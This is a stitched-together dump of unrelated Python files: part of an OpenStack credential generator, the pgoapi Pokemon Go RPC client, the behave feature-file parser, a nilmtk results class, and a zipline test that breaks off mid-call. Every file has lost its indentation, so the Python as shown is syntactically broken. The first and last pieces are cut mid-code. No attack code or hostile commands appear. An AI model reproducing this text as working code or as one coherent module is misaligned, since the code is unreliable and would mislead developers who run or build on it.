"""Generate new secret string.
The generator method will check for a known method type and if found
generates a hashed string which is then routed to the appropriate
method.
:param pw_type: ``str`` Type of secret to generate.
:returns: ``str``
"""
if hasattr(self, '_%s_gen' % pw_type):
encoded_bytes = self._encode_bytes()
func = getattr(self, '_%s_gen' % pw_type)
return func(encoded_bytes=encoded_bytes)
else:
raise SystemExit('Unknown secret type passed. [ %s ]' % pw_type)
@staticmethod
def _random_bytes():
"""Returns 1024 random bytes of data."""
return Random.get_random_bytes(1024)
def _encode_bytes(self):
"""Builds random strings based on random data.
`_encode_bytes` will ensure that there's never an opportunity for
duplicate data. Once the bytes are generated, they are hashed using
SHA512 and the returned as a **hex** digest.
"""
random_bytes = self._random_bytes()
hash_obj = hashlib.sha512(random_bytes)
return hash_obj.hexdigest()
def _password_gen(self, encoded_bytes):
"""Returns ``str`` with a length between 16 and 64.
:param encoded_bytes: ``str`` must be at least 64 charters long
"""
return encoded_bytes[:random.randrange(16, 64)]
def _token_gen(self, encoded_bytes):
"""Returns ``str`` with a length between 48 and 64.
:param encoded_bytes: ``str`` must be at least 72 charters long
"""
return encoded_bytes[:random.randrange(64, 72)]
def _key_gen(self, encoded_bytes):
"""Returns ``str`` with a length of 24 or 32.
Length restriction are required for key type secrets because of
requirements in AES.
:param encoded_bytes: ``str`` must be at least 32 charters long
"""
return encoded_bytes[:random.choice([24, 32])]
def args():
"""Setup argument Parsing."""
parser = argparse.ArgumentParser(
usage='%(prog)s',
description='OpenStack Token Password and Key Generator',
epilog='Inventory Generator Licensed "Apache 2.0"'
)
parser.add_argument(
'--file',
help='User defined configuration file',
required=True,
default=None
)
parser.add_argument(
'--regen',
help='Regenerate all passwords',
action='store_true',
default=False
)
return vars(parser.parse_args())
def main():
"""Run the main Application.
This will open a file that was specified on the command line. The file
specified is assumed to be in valid YAML format, which is used in ansible.
When the YAML file will be processed and any key with a null value that
ends with 'password', 'token', 'key' or 'uuid' will have a generated
password set as the value.
The main function will create a backup of all changes in the file as a
tarball in the same directory as the file specified.
Command line usage has one required argument and one optional. The
argument ``--file`` is used to specify the file which passwords will be
generated within. The argument ``--regen`` is used to regenerate all
secrets within a file even if they were already set.
"""
all_args = args()
user_vars_file = all_args['file']
user_vars_file = os.path.abspath(
os.path.expanduser(
user_vars_file
)
)
with open(user_vars_file, 'rb') as f:
user_vars = yaml.safe_load(f.read())
if not user_vars:
raise SystemExit(
'FAIL: The variable file provided [ %s ] is empty.'
% user_vars_file
)
changed = False
generator = CredentialGenerator()
for entry, value in user_vars.iteritems():
if value is None or all_args['regen'] is True:
if entry.endswith('password') or entry.endswith('secret'):
changed = True
user_vars[entry] = generator.generator(pw_type='password')
elif entry.endswith('token'):
changed = True
user_vars[entry] = generator.generator(pw_type='token')
elif entry.endswith('key'):
changed = True
user_vars[entry] = generator.generator(pw_type='key')
elif entry.endswith('uuid'):
changed = True
user_vars[entry] = str(uuid.uuid4())
elif entry.startswith('swift_hash_path'):
changed = True
user_vars[entry] = generator.generator(pw_type='key')
# If changed is set to True, this will archive the old passwords
if changed is True:
user_vars_tar_file = '%s.tar' % user_vars_file
print('Creating backup file [ %s ]' % user_vars_tar_file)
# Create a tarball if needed
with tarfile.open(user_vars_tar_file, 'a') as tar:
os.chmod(user_vars_tar_file, 0o600)
basename = os.path.basename(user_vars_file)
# Time stamp the password file in UTC
utctime = datetime.datetime.utcnow()
utctime = utctime.strftime('%Y%m%d_%H%M%S')
backup_name = '%s-%s' % (basename, utctime)
tar.add(user_vars_file, arcname=backup_name)
with open(user_vars_file, 'wb') as f:
os.chmod(user_vars_file, 0o600)
f.write(
yaml.safe_dump(
user_vars,
default_flow_style=False,
width=1000
)
)
print('Operation Complete, [ %s ] is ready' % user_vars_file)
if __name__ == '__main__':
main()
|
|
"""
pgoapi - Pokemon Go API
Copyright (c) 2016 tjado <https://github.com/tejado>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
Author: tjado <https://github.com/tejado>
"""
from __future__ import absolute_import
import re
import base64
import random
import logging
import requests
import subprocess
from google.protobuf import message
from importlib import import_module
from pgoapi.protobuf_to_dict import protobuf_to_dict
from pgoapi.exceptions import NotLoggedInException, ServerBusyOrOfflineException, ServerSideRequestThrottlingException
from pgoapi.utilities import f2i, h2f, to_camel_case, get_time_ms, get_format_time_diff
from . import protos
from POGOProtos.Networking.Envelopes_pb2 import RequestEnvelope
from POGOProtos.Networking.Envelopes_pb2 import ResponseEnvelope
from POGOProtos.Networking.Requests_pb2 import RequestType
class RpcApi:
RPC_ID = 0
def __init__(self, auth_provider):
self.log = logging.getLogger(__name__)
self._session = requests.session()
self._session.headers.update({'User-Agent': 'Niantic App'})
self._session.verify = True
self._auth_provider = auth_provider
if RpcApi.RPC_ID == 0:
RpcApi.RPC_ID = int(random.random() * 10 ** 18)
self.log.debug('Generated new random RPC Request id: %s', RpcApi.RPC_ID)
def get_rpc_id(self):
RpcApi.RPC_ID += 1
self.log.debug("Incremented RPC Request ID: %s", RpcApi.RPC_ID)
return RpcApi.RPC_ID
def decode_raw(self, raw):
output = error = None
try:
process = subprocess.Popen(['protoc', '--decode_raw'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = process.communicate(raw)
except:
output = "Couldn't find protoc in your environment OR other issue..."
return output
def get_class(self, cls):
module_, class_ = cls.rsplit('.', 1)
class_ = getattr(import_module(module_), class_)
return class_
def _make_rpc(self, endpoint, request_proto_plain):
self.log.debug('Execution of RPC')
request_proto_serialized = request_proto_plain.SerializeToString()
try:
http_response = self._session.post(endpoint, data=request_proto_serialized)
except requests.exceptions.ConnectionError as e:
raise ServerBusyOrOfflineException
return http_response
def request(self, endpoint, subrequests, player_position):
if not self._auth_provider or self._auth_provider.is_login() is False:
raise NotLoggedInException()
request_proto = self._build_main_request(subrequests, player_position)
response = self._make_rpc(endpoint, request_proto)
response_dict = self._parse_main_response(response, subrequests)
if ('auth_ticket' in response_dict) and ('expire_timestamp_ms' in response_dict['auth_ticket']) and (self._auth_provider.is_new_ticket(response_dict['auth_ticket']['expire_timestamp_ms'])):
had_ticket = self._auth_provider.has_ticket()
auth_ticket = response_dict['auth_ticket']
self._auth_provider.set_ticket(
[auth_ticket['expire_timestamp_ms'], base64.standard_b64decode(auth_ticket['start']), base64.standard_b64decode(auth_ticket['end'])])
now_ms = get_time_ms()
h, m, s = get_format_time_diff(now_ms, auth_ticket['expire_timestamp_ms'], True)
if had_ticket:
self.log.debug('Replacing old auth ticket with new one valid for %02d:%02d:%02d hours (%s < %s)', h, m, s, now_ms, auth_ticket['expire_timestamp_ms'])
else:
self.log.debug('Received auth ticket valid for %02d:%02d:%02d hours (%s < %s)', h, m, s, now_ms, auth_ticket['expire_timestamp_ms'])
if isinstance(response_dict, dict) and 'status_code' in response_dict:
sc = response_dict['status_code']
if sc == 102:
raise NotLoggedInException()
elif sc == 52:
raise ServerSideRequestThrottlingException("Request throttled by server... slow down man")
return response_dict
def _build_main_request(self, subrequests, player_position = None):
self.log.debug('Generating main RPC request...')
request = RequestEnvelope()
request.status_code = 2
request.request_id = self.get_rpc_id()
if player_position is not None:
request.latitude, request.longitude, request.altitude = player_position
ticket = self._auth_provider.get_ticket()
if ticket:
self.log.debug('Found auth ticket - using this instead of oauth token')
request.auth_ticket.expire_timestamp_ms, request.auth_ticket.start, request.auth_ticket.end = ticket
else:
self.log.debug('NO auth ticket found - using oauth token')
request.auth_info.provider = self._auth_provider.get_name()
request.auth_info.token.contents = self._auth_provider.get_token()
request.auth_info.token.unknown2 = 59
# unknown stuff
request.unknown12 = 989
request = self._build_sub_requests(request, subrequests)
self.log.debug('Generated protobuf request: \n\r%s', request )
return request
def _build_sub_requests(self, mainrequest, subrequest_list):
self.log.debug('Generating sub RPC requests...')
for entry in subrequest_list:
if isinstance(entry, dict):
entry_id = list(entry.items())[0][0]
entry_content = entry[entry_id]
entry_name = RequestType.Name(entry_id)
proto_name = to_camel_case(entry_name.lower()) + 'Message'
proto_classname = 'POGOProtos.Networking.Requests.Messages_pb2.' + proto_name
subrequest_extension = self.get_class(proto_classname)()
self.log.debug("Subrequest class: %s", proto_classname)
for (key, value) in entry_content.items():
if isinstance(value, list):
self.log.debug("Found list: %s - trying as repeated", key)
for i in value:
try:
self.log.debug("%s -> %s", key, i)
r = getattr(subrequest_extension, key)
r.append(i)
except Exception as e:
self.log.warning('Argument %s with value %s unknown inside %s (Exception: %s)', key, i, proto_name, str(e))
elif isinstance(value, dict):
for k in value.keys():
try:
r = getattr(subrequest_extension, key)
setattr(r, k, value[k])
except Exception as e:
self.log.warning('Argument %s with value %s unknown inside %s (Exception: %s)', key, str(value), proto_name, str(e))
else:
try:
setattr(subrequest_extension, key, value)
except Exception as e:
try:
self.log.debug("%s -> %s", key, value)
r = getattr(subrequest_extension, key)
r.append(value)
except Exception as e:
self.log.warning('Argument %s with value %s unknown inside %s (Exception: %s)', key, value, proto_name, str(e))
subrequest = mainrequest.requests.add()
subrequest.request_type = entry_id
subrequest.request_message = subrequest_extension.SerializeToString()
elif isinstance(entry, int):
subrequest = mainrequest.requests.add()
subrequest.request_type = entry
else:
raise Exception('Unknown value in request list')
return mainrequest
def _parse_main_response(self, response_raw, subrequests):
self.log.debug('Parsing main RPC response...')
if response_raw.status_code != 200:
self.log.warning('Unexpected HTTP server response - needs 200 got %s', response_raw.status_code)
self.log.debug('HTTP output: \n%s', response_raw.content.decode('utf-8'))
return False
if response_raw.content is None:
self.log.warning('Empty server response!')
return False
response_proto = ResponseEnvelope()
try:
response_proto.ParseFromString(response_raw.content)
except message.DecodeError as e:
self.log.warning('Could not parse response: %s', str(e))
return False
self.log.debug('Protobuf structure of rpc response:\n\r%s', response_proto)
try:
self.log.debug('Decode raw over protoc (protoc has to be in your PATH):\n\r%s', self.decode_raw(response_raw.content).decode('utf-8'))
except:
self.log.debug('Error during protoc parsing - ignored.')
response_proto_dict = protobuf_to_dict(response_proto)
response_proto_dict = self._parse_sub_responses(response_proto, subrequests, response_proto_dict)
return response_proto_dict
def _parse_sub_responses(self, response_proto, subrequests_list, response_proto_dict):
self.log.debug('Parsing sub RPC responses...')
response_proto_dict['responses'] = {}
if 'returns' in response_proto_dict:
del response_proto_dict['returns']
list_len = len(subrequests_list) -1
i = 0
for subresponse in response_proto.returns:
if i > list_len:
self.log.info("Error - something strange happend...")
request_entry = subrequests_list[i]
if isinstance(request_entry, int):
entry_id = request_entry
else:
entry_id = list(request_entry.items())[0][0]
entry_name = RequestType.Name(entry_id)
proto_name = to_camel_case(entry_name.lower()) + 'Response'
proto_classname = 'POGOProtos.Networking.Responses_pb2.' + proto_name
self.log.debug("Parsing class: %s", proto_classname)
subresponse_return = None
try:
subresponse_extension = self.get_class(proto_classname)()
except Exception as e:
subresponse_extension = None
error = 'Protobuf definition for {} not found'.format(proto_classname)
subresponse_return = error
self.log.debug(error)
if subresponse_extension:
try:
subresponse_extension.ParseFromString(subresponse)
subresponse_return = protobuf_to_dict(subresponse_extension)
except:
error = "Protobuf definition for {} seems not to match".format(proto_classname)
subresponse_return = error
self.log.debug(error)
response_proto_dict['responses'][entry_name] = subresponse_return
i += 1
return response_proto_dict
|
|
# -*- coding: utf-8 -*-
from __future__ import with_statement
from behave import model, i18n
DEFAULT_LANGUAGE = 'en'
def parse_file(filename, language=None):
with open(filename, 'rb') as f:
# file encoding is assumed to be utf8. Oh, yes.
data = f.read().decode('utf8')
return parse_feature(data, language, filename)
def parse_feature(data, language=None, filename=None):
# ALL data operated on by the parser MUST be unicode
assert isinstance(data, unicode)
try:
result = Parser(language).parse(data, filename)
except ParserError, e:
e.filename = filename
raise
return result
def parse_steps(text, language=None, filename=None):
"""
Parse a number of steps a multi-line text from a scenario.
Scenario line with title and keyword is not provided.
:param text: Multi-line text with steps to parse (as unicode).
:param language: i18n language identifier (optional).
:param filename: Filename (optional).
:return: Parsed steps (if successful).
"""
assert isinstance(text, unicode)
try:
result = Parser(language, variant='steps').parse_steps(text, filename)
except ParserError, e:
e.filename = filename
raise
return result
def parse_tags(text):
"""
Parse tags from text (one or more lines, as string).
:param text: Multi-line text with tags to parse (as unicode).
:return: List of tags (if successful).
"""
# assert isinstance(text, unicode)
if not text:
return []
return Parser().parse_tags(text)
class ParserError(Exception):
def __init__(self, message, line, filename=None, line_text=None):
if line:
message += ' at line %d' % line
if line_text:
message += ": '%s'" % line_text.strip()
super(ParserError, self).__init__(message)
self.line = line
self.line_text = line_text
self.filename = filename
def __str__(self):
if self.filename:
return 'Failed to parse "%s": %s' % (self.filename, self.args[0])
return 'Failed to parse <string>: %s' % self.args[0]
class Parser(object):
# pylint: disable=W0201,R0902
# W0201 Attribute ... defined outside __init__() method => reset()
# R0902 Too many instance attributes (15/10)
def __init__(self, language=None, variant=None):
if not variant:
variant = 'feature'
self.language = language
self.variant = variant
self.reset()
def reset(self):
# This can probably go away.
if self.language:
self.keywords = i18n.languages[self.language]
else:
self.keywords = None
self.state = 'init'
self.line = 0
self.last_step = None
self.multiline_start = None
self.multiline_leading = None
self.multiline_terminator = None
self.filename = None
self.feature = None
self.statement = None
self.tags = []
self.lines = []
self.table = None
self.examples = None
def parse(self, data, filename=None):
self.reset()
self.filename = filename
for line in data.split('\n'):
self.line += 1
if not line.strip() and not self.state == 'multiline':
# -- SKIP EMPTY LINES, except in multiline string args.
continue
self.action(line)
if self.table:
self.action_table('')
feature = self.feature
if feature:
feature.parser = self
self.reset()
return feature
def _build_feature(self, keyword, line):
name = line[len(keyword) + 1:].strip()
self.feature = model.Feature(self.filename, self.line, keyword,
name, tags=self.tags)
# -- RESET STATE:
self.tags = []
def _build_background_statement(self, keyword, line):
if self.tags:
msg = 'Background supports no tags: @%s' % (' @'.join(self.tags))
raise ParserError(msg, self.line, self.filename, line)
name = line[len(keyword) + 1:].strip()
statement = model.Background(self.filename, self.line, keyword, name)
self.statement = statement
self.feature.background = self.statement
def _build_scenario_statement(self, keyword, line):
name = line[len(keyword) + 1:].strip()
self.statement = model.Scenario(self.filename, self.line,
keyword, name, tags=self.tags)
self.feature.add_scenario(self.statement)
# -- RESET STATE:
self.tags = []
def _build_scenario_outline_statement(self, keyword, line):
# pylint: disable=C0103
# C0103 Invalid name "build_scenario_outline_statement", too long.
name = line[len(keyword) + 1:].strip()
self.statement = model.ScenarioOutline(self.filename, self.line,
keyword, name, tags=self.tags)
self.feature.add_scenario(self.statement)
# -- RESET STATE:
self.tags = []
def _build_examples(self, keyword, line):
if not isinstance(self.statement, model.ScenarioOutline):
message = 'Examples must only appear inside scenario outline'
raise ParserError(message, self.line, self.filename, line)
name = line[len(keyword) + 1:].strip()
self.examples = model.Examples(self.filename, self.line,
keyword, name)
# pylint: disable=E1103
# E1103 Instance of 'Background' has no 'examples' member
# (but some types could not be inferred).
self.statement.examples.append(self.examples)
def diagnose_feature_usage_error(self):
if self.feature:
return "Multiple features in one file are not supported."
else:
return "Feature should not be used here."
def diagnose_background_usage_error(self):
if self.feature and self.feature.scenarios:
return "Background may not occur after Scenario/ScenarioOutline."
elif self.tags:
return "Background does not support tags."
else:
return "Background should not be used here."
def diagnose_scenario_usage_error(self):
if not self.feature:
return "Scenario may not occur before Feature."
else:
return "Scenario should not be used here."
def diagnose_scenario_outline_usage_error(self):
if not self.feature:
return "ScenarioOutline may not occur before Feature."
else:
return "ScenarioOutline should not be used here."
def ask_parse_failure_oracle(self, line):
"""
Try to find the failure reason when a parse failure occurs:
Oracle, oracle, ... what went wrong?
Zzzz
:param line: Text line where parse failure occured (as string).
:return: Reason (as string) if an explanation is found.
Otherwise, empty string or None.
"""
feature_kwd = self.match_keyword('feature', line)
if feature_kwd:
return self.diagnose_feature_usage_error()
background_kwd = self.match_keyword('background', line)
if background_kwd:
return self.diagnose_background_usage_error()
scenario_kwd = self.match_keyword('scenario', line)
if scenario_kwd:
return self.diagnose_scenario_usage_error()
scenario_outline_kwd = self.match_keyword('scenario_outline', line)
if scenario_outline_kwd:
return self.diagnose_scenario_outline_usage_error()
# -- OTHERWISE:
if self.variant == 'feature' and not self.feature:
return "No feature found."
# -- FINALLY: No glue what went wrong.
return None
def action(self, line):
if line.strip().startswith('#') and not self.state == 'multiline':
if self.keywords or self.state != 'init' or self.tags:
return
line = line.strip()[1:].strip()
if line.lstrip().lower().startswith('language:'):
language = line[9:].strip()
self.language = language
self.keywords = i18n.languages[language]
return
func = getattr(self, 'action_' + self.state, None)
if func is None:
line = line.strip()
msg = "Parser in unknown state %s;" % self.state
raise ParserError(msg, self.line, self.filename, line)
if not func(line):
line = line.strip()
msg = u"\nParser failure in state %s, at line %d: '%s'\n" % \
(self.state, self.line, line)
reason = self.ask_parse_failure_oracle(line)
if reason:
msg += u"REASON: %s" % reason
raise ParserError(msg, None, self.filename)
def action_init(self, line):
line = line.strip()
if line.startswith('@'):
self.tags.extend(self.parse_tags(line))
return True
feature_kwd = self.match_keyword('feature', line)
if feature_kwd:
self._build_feature(feature_kwd, line)
self.state = 'feature'
return True
return False
def subaction_detect_next_scenario(self, line):
if line.startswith('@'):
self.tags.extend(self.parse_tags(line))
self.state = 'next_scenario'
return True
scenario_kwd = self.match_keyword('scenario', line)
if scenario_kwd:
self._build_scenario_statement(scenario_kwd, line)
self.state = 'scenario'
return True
scenario_outline_kwd = self.match_keyword('scenario_outline', line)
if scenario_outline_kwd:
self._build_scenario_outline_statement(scenario_outline_kwd, line)
self.state = 'scenario'
return True
# -- OTHERWISE:
return False
def action_feature(self, line):
line = line.strip()
if self.subaction_detect_next_scenario(line):
return True
background_kwd = self.match_keyword('background', line)
if background_kwd:
self._build_background_statement(background_kwd, line)
self.state = 'steps'
return True
self.feature.description.append(line)
return True
def action_next_scenario(self, line):
"""
Entered after first tag for Scenario/ScenarioOutline is detected.
"""
line = line.strip()
if self.subaction_detect_next_scenario(line):
return True
return False
def action_scenario(self, line):
"""
Entered when Scenario/ScenarioOutline keyword/line is detected.
Hunts/collects scenario description lines.
DETECT:
* first step of Scenario/ScenarioOutline
* next Scenario/ScenarioOutline.
"""
line = line.strip()
step = self.parse_step(line)
if step:
# -- FIRST STEP DETECTED: End collection of scenario descriptions.
self.state = 'steps'
self.statement.steps.append(step)
return True
# -- CASE: Detect next Scenario/ScenarioOutline
# * Scenario with scenario description, but without steps.
# * Title-only scenario without scenario description and steps.
if self.subaction_detect_next_scenario(line):
return True
# -- OTHERWISE: Add scenario description line.
# pylint: disable=E1103
# E1103 Instance of 'Background' has no 'description' member...
self.statement.description.append(line)
return True
def action_steps(self, line):
"""
Entered when first step is detected (or nested step parsing).
Subcases:
* step
* multi-line text (doc-string), following a step
* table, following a step
* examples for a ScenarioOutline, after ScenarioOutline steps
DETECT:
* next Scenario/ScenarioOutline
"""
# pylint: disable=R0911
# R0911 Too many return statements (8/6)
stripped = line.lstrip()
if stripped.startswith('"""') or stripped.startswith("'''"):
self.state = 'multiline'
self.multiline_start = self.line
self.multiline_terminator = stripped[:3]
self.multiline_leading = line.index(stripped[0])
return True
line = line.strip()
step = self.parse_step(line)
if step:
self.statement.steps.append(step)
return True
if self.subaction_detect_next_scenario(line):
return True
examples_kwd = self.match_keyword('examples', line)
if examples_kwd:
self._build_examples(examples_kwd, line)
self.state = 'table'
return True
if line.startswith('|'):
assert self.statement.steps, "TABLE-START without step detected."
self.state = 'table'
return self.action_table(line)
return False
def action_multiline(self, line):
if line.strip().startswith(self.multiline_terminator):
step = self.statement.steps[-1]
step.text = model.Text(u'\n'.join(self.lines), u'text/plain',
self.multiline_start)
if step.name.endswith(':'):
step.name = step.name[:-1]
self.lines = []
self.multiline_terminator = None
self.state = 'steps'
return True
self.lines.append(line[self.multiline_leading:])
# -- BETTER DIAGNOSTICS: May remove non-whitespace in execute_steps()
removed_line_prefix = line[:self.multiline_leading]
if removed_line_prefix.strip():
message = "BAD-INDENT in multiline text: "
message += "Line '%s' would strip leading '%s'" % \
(line, removed_line_prefix)
raise ParserError(message, self.line, self.filename)
return True
def action_table(self, line):
line = line.strip()
if not line.startswith('|'):
if self.examples:
self.examples.table = self.table
self.examples = None
else:
step = self.statement.steps[-1]
step.table = self.table
if step.name.endswith(':'):
step.name = step.name[:-1]
self.table = None
self.state = 'steps'
return self.action_steps(line)
cells = [cell.strip() for cell in line.split('|')[1:-1]]
if self.table is None:
self.table = model.Table(cells, self.line)
else:
if len(cells) != len(self.table.headings):
raise ParserError("Malformed table", self.line)
self.table.add_row(cells, self.line)
return True
def match_keyword(self, keyword, line):
if not self.keywords:
self.language = DEFAULT_LANGUAGE
self.keywords = i18n.languages[DEFAULT_LANGUAGE]
for alias in self.keywords[keyword]:
if line.startswith(alias + ':'):
return alias
return False
def parse_tags(self, line):
'''
Parse a line with one or more tags:
* A tag starts with the AT sign.
* A tag consists of one word without whitespace chars.
* Multiple tags are separated with whitespace chars
* End-of-line comment is stripped.
:param line: Line with one/more tags to process.
:raise ParseError: If syntax error is detected.
'''
assert line.startswith('@')
tags = []
for word in line.split():
if word.startswith('@'):
tags.append(model.Tag(word[1:], self.line))
elif word.startswith('#'):
break # -- COMMENT: Skip rest of line.
else:
# -- BAD-TAG: Abort here.
raise ParserError("tag: %s (line: %s)" % (word, line),
self.line, self.filename)
return tags
def parse_step(self, line):
for step_type in ('given', 'when', 'then', 'and', 'but'):
for kw in self.keywords[step_type]:
if kw.endswith('<'):
whitespace = ''
kw = kw[:-1]
else:
whitespace = ' '
# try to match the keyword; also attempt a purely lowercase
# match if that'll work
if not (line.startswith(kw + whitespace)
or line.lower().startswith(kw.lower() + whitespace)):
continue
name = line[len(kw):].strip()
if step_type in ('and', 'but'):
if not self.last_step:
raise ParserError("No previous step", self.line)
step_type = self.last_step
else:
self.last_step = step_type
step = model.Step(self.filename, self.line, kw, step_type,
name)
return step
return None
def parse_steps(self, text, filename=None):
"""
Parse support for execute_steps() functionality that supports step with:
* multiline text
* table
:param text: Text that contains 0..* steps
:return: List of parsed steps (as model.Step objects).
"""
assert isinstance(text, unicode)
if not self.language:
self.language = u"en"
self.reset()
self.filename = filename
self.statement = model.Scenario(filename, 0, u"scenario", u"")
self.state = 'steps'
for line in text.split("\n"):
self.line += 1
if not line.strip() and not self.state == 'multiline':
# -- SKIP EMPTY LINES, except in multiline string args.
continue
self.action(line)
# -- FINALLY:
if self.table:
self.action_table("")
steps = self.statement.steps
return steps
|
|
import abc
import pandas as pd
import copy
from .timeframe import TimeFrame
from nilmtk.utils import get_tz, tz_localize_naive
class Results(object):
"""Stats results from each node need to be assigned to a specific
class so we know how to combine results from multiple chunks. For
example, Energy can be simply summed; while dropout rate should be
averaged, and gaps need to be merged across chunk boundaries. Results
objects contain a DataFrame, the index of which is the start timestamp for
which the results are valid; the first column ('end') is the end
timestamp for which the results are valid. Other columns are accumulators
for the results.
Attributes
----------
_data : DataFrame
Index is period start.
Columns are: `end` and any columns for internal storage of stats.
Static Attributes
-----------------
name : str
The string used to cache this results object.
"""
__metaclass__ = abc.ABCMeta
def __init__(self):
self._data = pd.DataFrame(columns=['end'])
def combined(self):
"""Return all results from each chunk combined. Either return single
float for all periods or a dict where necessary, e.g. if
calculating Energy for a meter which records both apparent
power and active power then get active power with
energyresults.combined['active']
"""
return self._data[self._columns_with_end_removed()].sum()
def per_period(self):
"""return a DataFrame. Index is period start.
Columns are: end and <stat name>
"""
return copy.deepcopy(self._data)
def simple(self):
"""Returns the simplest representation of the results."""
return self.combined()
def append(self, timeframe, new_results):
"""Append a single result.
Parameters
----------
timeframe : nilmtk.TimeFrame
new_results : dict
"""
if not isinstance(timeframe, TimeFrame):
raise TypeError("`timeframe` must be of type 'nilmtk.TimeFrame',"
" not '{}' type.".format(type(timeframe)))
if not isinstance(new_results, dict):
raise TypeError("`new_results` must of a dict, not '{}' type."
.format(type(new_results)))
# check that there is no overlap
for index, series in self._data.iterrows():
tf = TimeFrame(index, series['end'])
tf.check_for_overlap(timeframe)
row = pd.DataFrame(index=[timeframe.start],
columns=['end'] + new_results.keys())
row['end'] = timeframe.end
for key, val in new_results.iteritems():
row[key] = val
self._data = self._data.append(row, verify_integrity=True)
self._data.sort_index(inplace=True)
def check_for_overlap(self):
# TODO this could be made much faster
n = len(self._data)
index = self._data.index
for i in range(n):
row1 = self._data.iloc[i]
tf1 = TimeFrame(index[i], row1['end'])
for j in range(i+1, n):
row2 = self._data.iloc[j]
tf2 = TimeFrame(index[j], row2['end'])
tf1.check_for_overlap(tf2)
def update(self, new_result):
"""Add results from a new chunk.
Parameters
----------
new_result : Results subclass (same
class as self) from new chunk of data.
"""
if not isinstance(new_result, self.__class__):
raise TypeError("new_results must be of type '{}'"
.format(self.__class__))
if new_result._data.empty:
return
self._data = self._data.append(new_result._data)
self._data.sort_index(inplace=True)
self.check_for_overlap()
def unify(self, other):
"""Take results from another table of data (another physical meter)
and merge those results into self. For example, if we have a dual-split
mains supply then we want to merge the results from each physical meter.
The two sets of results must be for exactly the same timeframes.
Parameters
----------
other : Results subclass (same class as self).
Results calculated from another table of data.
"""
assert isinstance(other, self.__class__)
for i, row in self._data.iterrows():
if (other._data['end'].loc[i] != row['end'] or
i not in other._data.index):
raise RuntimeError("The sections we are trying to merge"
" do not have the same end times so we"
" cannot merge them.")
def import_from_cache(self, cached_stat, sections):
"""
Parameters
----------
cached_stat : DataFrame of cached data
sections : list of nilmtk.TimeFrame objects
describing the sections we want to load stats for.
"""
if cached_stat.empty:
return
tz = get_tz(cached_stat)
usable_sections_from_cache = []
def append_row(row, section):
row = row.astype(object)
# We stripped off the timezone when exporting to cache
# so now we must put the timezone back.
row['end'] = tz_localize_naive(row['end'], tz)
if row['end'] == section.end:
usable_sections_from_cache.append(row)
for section in sections:
if not section:
continue
try:
rows_matching_start = cached_stat.loc[section.start]
except KeyError:
pass
else:
if isinstance(rows_matching_start, pd.Series):
append_row(rows_matching_start, section)
else:
for row_i in range(rows_matching_start.shape[0]):
row = rows_matching_start.iloc[row_i]
append_row(row, section)
self._data = pd.DataFrame(usable_sections_from_cache)
self._data.sort_index(inplace=True)
def export_to_cache(self):
"""
Returns
-------
pd.DataFrame
Notes
-----
Objects are converted using `DataFrame.convert_objects()`.
The reason for doing this is to strip out the timezone
information from data columns. We have to do this otherwise
Pandas complains if we try to put a column with multiple
timezones (e.g. Europe/London across a daylight saving
boundary).
"""
return self._data.convert_objects()
def timeframes(self):
"""Returns a list of timeframes covered by this Result."""
# For some reason, using `iterrows()` messes with the
# timezone of the index, hence we need to 'manually' iterate
# over the rows.
return [TimeFrame(self._data.index[i], self._data.iloc[i]['end'])
for i in range(len(self._data))]
def _columns_with_end_removed(self):
cols = set(self._data.columns)
if len(cols) > 0:
cols.remove('end')
cols = list(cols)
return cols
def __repr__(self):
return str(self._data)
|
|
#
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import deque
import pytz
import numpy as np
import pandas as pd
from datetime import datetime
from unittest import TestCase
from zipline.utils.test_utils import setup_logger, teardown_logger
from zipline.sources.data_source import DataSource
import zipline.utils.factory as factory
from zipline.transforms import batch_transform
from zipline.test_algorithms import (BatchTransformAlgorithm,
BatchTransformAlgorithmMinute,
ReturnPriceBatchTransform)
from zipline.algorithm import TradingAlgorithm
from zipline.utils.tradingcalendar import trading_days
from copy import deepcopy
@batch_transform
def return_price(data):
return data.price
class BatchTransformAlgorithmSetSid(TradingAlgorithm):
def initialize(self, sids=None):
self.history = []
self.batch_transform = return_price(
refresh_period=1,
window_length=10,
clean_nans=False,
sids=sids,
compute_only_full=False
)
def handle_data(self, data):
self.history.append(
deepcopy(self.batch_transform.handle_data(data)))
class DifferentSidSource(DataSource):
def __init__(self):
self.dates = pd.date_range('1990-01-01', periods=180, tz='utc')
self.start = self.dates[0]
self.end = self.dates[-1]
self._raw_data = None
self.sids = range(90)
self.sid = 0
self.trading_days = []
@property
def instance_hash(self):
return '1234'
@property
def raw_data(self):
if not self._raw_data:
self._raw_data = self.raw_data_gen()
return self._raw_data
@property
def mapping(self):
return {
'dt': (lambda x: x, 'dt'),
'sid': (lambda x: x, 'sid'),
'price': (float, 'price'),
'volume': (int, 'volume'),
}
def raw_data_gen(self):
# Create differente sid for each event
for date in self.dates:
if date not in trading_days:
continue
event = {'dt': date,
'sid': self.sid,
'price': self.sid,
'volume': self.sid}
self.sid += 1
self.trading_days.append(date)
yield event
class TestChangeOfSids(TestCase):
def setUp(self):
self.sids = range(90)
self.sim_params = factory.create_simulation_parameters(
start=datetime(1990, 1, 1, tzinfo=pytz.utc),
